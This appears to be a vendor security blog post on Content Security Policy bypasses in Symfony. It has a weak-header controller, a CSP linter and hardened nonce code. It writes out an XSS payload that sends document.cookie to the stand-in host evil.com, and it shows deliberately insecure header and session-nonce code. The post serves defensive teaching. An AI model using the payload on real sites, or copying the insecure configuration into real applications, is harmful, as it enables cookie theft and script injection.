🚨 CSP Bypass in Symfony: How It Happens and How to Prevent It
Content Security Policy (CSP) is a powerful web security standard to prevent XSS and data injection. But developers often misconfigure CSP headers in Symfony apps, making them prone to bypasses.
In this post, we’ll explain how a CSP bypass works in Symfony, show realistic coding examples, and share mitigation tips. We’ll also use our Website Vulnerability Scanner online to test CSP misconfigurations.
If you’re building or auditing Symfony apps, this guide is for you!
🧐 What is a CSP Bypass?
CSP defines which resources the browser is allowed to load. But attackers can exploit overly broad policies, missing directives, or misconfigured nonces to inject malicious scripts.
Example bypass scenarios in Symfony include:
- Using `'unsafe-inline'` or `'unsafe-eval'` in the policy.
- Allowlisting `*.example.com`, which a subdomain takeover turns into an attacker-controlled script host (one forgotten CNAME on any subdomain is enough).
- Misusing `nonce` attributes by reusing the same value across requests or for a whole session.
🧪 Example: Misconfigured CSP in Symfony
Here’s a typical Symfony controller setting a weak CSP header:
// src/Controller/SecurityController.php
use Symfony\Component\HttpFoundation\Response;

// Inside a controller action; $content is the rendered page body.
$response = new Response($content);
// Weak on purpose: any origin for every resource type, plus inline scripts.
$response->headers->set('Content-Security-Policy', "default-src *; script-src 'unsafe-inline'");
return $response;
Why is this bad?
- `default-src *` allows loading from any origin, and every directive you did not set (`connect-src`, `img-src`, `object-src`, ...) inherits it.
- `'unsafe-inline'` allows inline scripts, defeating CSP's purpose.
CSP never prevents the injection itself; it is the second line of defence that stops injected code from running. With `'unsafe-inline'` in `script-src`, any XSS flaw in the app gives the attacker script execution exactly as if no policy were set.
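The bypass conditions listed above and the weak header in this controller are all visible in the header string itself, so they can be checked before a browser ever sees the page. The following linter is an added example written for this post, not code from the original article or from Symfony; the function names, the finding messages and the two sample policies are this example's own choices, and it assumes PHP 8.0 or newer for `str_starts_with`/`str_contains`. It goes a little beyond the list above by also checking `object-src`, `base-uri` and `data:` script sources, which a practitioner would want flagged in the same pass.

```php
<?php
// Added example, not code from the original post: a small linter that parses a
// Content-Security-Policy value and flags the weaknesses discussed above.
// Function and message names are this example's own choice. Needs PHP 8.0+.
declare(strict_types=1);

/** Parse "name value value; name ..." into ['name' => ['value', ...]]. */
function parseCsp(string $policy): array
{
    $directives = [];
    foreach (explode(';', $policy) as $chunk) {
        $tokens = preg_split('/\s+/', trim($chunk), -1, PREG_SPLIT_NO_EMPTY);
        if ($tokens === []) {
            continue;
        }
        $name = strtolower(array_shift($tokens));
        // Browsers honour the first occurrence of a directive and ignore repeats.
        if (!isset($directives[$name])) {
            $directives[$name] = $tokens;
        }
    }
    return $directives;
}

/** Source list that governs $name, falling back to default-src where the spec does. */
function effectiveSources(array $directives, string $name): ?array
{
    // base-uri and frame-ancestors never inherit from default-src.
    if (isset($directives[$name]) || in_array($name, ['base-uri', 'frame-ancestors'], true)) {
        return $directives[$name] ?? null;
    }
    return $directives['default-src'] ?? null;
}

/** Return human-readable findings; an empty array means nothing obvious was found. */
function lintCsp(string $policy): array
{
    $d = parseCsp($policy);
    $findings = [];

    if (in_array('*', $d['default-src'] ?? [], true)) {
        $findings[] = 'default-src allows any origin (*): unset directives such as connect-src and img-src inherit it';
    }

    $scripts = effectiveSources($d, 'script-src');
    if ($scripts === null) {
        $findings[] = 'no script-src and no default-src: scripts may load from anywhere';
        $scripts = [];
    }
    // Keywords and hosts match case-insensitively; nonces do not, so keep originals for display.
    $lower = array_map('strtolower', $scripts);
    // With a nonce or hash present, CSP3 browsers ignore 'unsafe-inline'.
    $hasNonceOrHash = preg_grep("/^'(nonce-|sha(256|384|512)-)/", $lower) !== [];

    if (in_array("'unsafe-inline'", $lower, true) && !$hasNonceOrHash) {
        $findings[] = "script-src allows 'unsafe-inline': any injected <script> runs";
    }
    if (in_array("'unsafe-eval'", $lower, true)) {
        $findings[] = "script-src allows 'unsafe-eval': eval()/new Function() on injected strings";
    }
    if (in_array('*', $lower, true)) {
        $findings[] = 'script-src allows any origin (*)';
    }
    if (in_array('data:', $lower, true)) {
        $findings[] = 'script-src allows data: URIs, which is inline script by another name';
    }
    foreach ($scripts as $i => $src) {
        if (str_starts_with($lower[$i], '*.') || str_contains($lower[$i], '://*.')) {
            $findings[] = "script-src trusts wildcard host $src (a subdomain takeover widens it)";
        }
    }
    if (effectiveSources($d, 'object-src') !== ["'none'"]) {
        $findings[] = "object-src is not 'none': plugin content can still be embedded";
    }
    if (!isset($d['base-uri'])) {
        $findings[] = 'base-uri not set: an injected <base> can redirect relative script URLs';
    }
    return $findings;
}

// Constructed sample policies: the weak one from this post and a hardened one.
if (PHP_SAPI === 'cli' && realpath($argv[0] ?? '') === __FILE__) {
    $weak   = "default-src *; script-src 'unsafe-inline'";
    $strict = "default-src 'self'; script-src 'nonce-abc123' 'strict-dynamic'; object-src 'none'; base-uri 'self'";
    foreach ([$weak, $strict] as $policy) {
        echo $policy, "\n";
        $findings = lintCsp($policy);
        echo $findings === [] ? "  (no findings)\n" : '';
        foreach ($findings as $f) {
            echo '  - ', $f, "\n";
        }
    }
}
```

Run it with `php csp-lint.php` (any file name works). The weak policy from this post produces four findings (wildcard `default-src`, inline scripts, `object-src`, `base-uri`); the hardened one produces none. The fallback logic mirrors how browsers resolve directives: `script-src` and `object-src` inherit `default-src` when absent, `base-uri` does not, which is why a missing `base-uri` is reported even when `default-src 'self'` is set.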
💣 CSP Bypass Exploit in Symfony
If the above code is deployed, an attacker who finds any injection point (a reflected parameter, a stored comment) might craft a payload like this:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
Since `'unsafe-inline'` is allowed, the browser executes it. And because `default-src *` also governs `connect-src`, the fetch to evil.com is allowed too. With `connect-src` locked to `'self'` that particular exfiltration request would be blocked, but the injected script would still run, which is the real failure.
Even if you use nonces, a common mistake is to generate the value once and keep it for the whole session:
$nonce = $_SESSION['nonce']; // ❌ bad: same value for every request in the session (same problem if read via Symfony's $request->getSession())
A nonce that lives for a session is only as secret as every page that carries it. Once any one of those responses is exposed (a cached copy, a leaked page source, a separate read primitive), the attacker holds a `nonce` attribute that stays valid for every later request in that session and can put it on an injected `<script>`. A per-request nonce is worthless to an attacker the moment the response has been rendered.
📸 Free Tool Preview
Below is a screenshot of our Website Vulnerability Scanner tool that you can use to scan your Symfony site for CSP and other vulnerabilities:
[Screenshot: the free tools page where you can access the security assessment tools.]
You can generate a free vulnerability report after testing. Here’s an example of such a report to check Website Vulnerability:
[Screenshot: an example vulnerability assessment report generated with the free tool, listing possible vulnerabilities.]
🛡️ How to Fix CSP in Symfony
✅ Use strict CSP headers:
use Symfony\Component\HttpFoundation\Response;

$nonce = base64_encode(random_bytes(16)); // fresh CSPRNG value for this request only
$response = new Response($content);
$response->headers->set(
'Content-Security-Policy',
"default-src 'self'; script-src 'nonce-$nonce' 'strict-dynamic'; object-src 'none'; base-uri 'self'"
);
// Every legitimate inline or external script in the template must carry the same value:
// <script nonce="{{ csp_nonce }}">...</script>
✅ Make sure the nonce is unique per request, and keep it with the request rather than in the session:
$nonce = base64_encode(random_bytes(16));
$request->attributes->set('csp_nonce', $nonce); // lives only for this request; templates read it from here
Nothing about the nonce should persist beyond the response that uses it, so the session is the wrong place for it.
✅ Avoid wildcards (`*`, `*.example.com`) and avoid `'unsafe-inline'` and `'unsafe-eval'`.
✅ Use Free Website Security Scanner to detect CSP misconfigurations.
🔗 Learn More on Our Blog
We regularly post about web app security on our Pentest Testing Blog.
Check out related posts:
📈 Relevant Services We Offer
🔍 Web App Penetration Testing
If you want experts to test your Symfony app’s security (including CSP), check out our full Web App Penetration Testing Service.
🤝 Offer Cybersecurity to Your Clients
If you’re a developer, agency, or MSP, partner with us to Offer Cybersecurity Services to Your Clients.
📬 Stay Updated!
We publish actionable security tips, case studies, and tool updates every week.
👉 Subscribe on LinkedIn
📄 Conclusion
CSP is critical, but misconfigurations in Symfony can undermine its effectiveness. Ship strict policies, generate a fresh nonce on every request, and regularly scan your site for CSP and other misconfigurations with our free tool.
If you found this helpful, don’t forget to follow us and subscribe to our newsletter!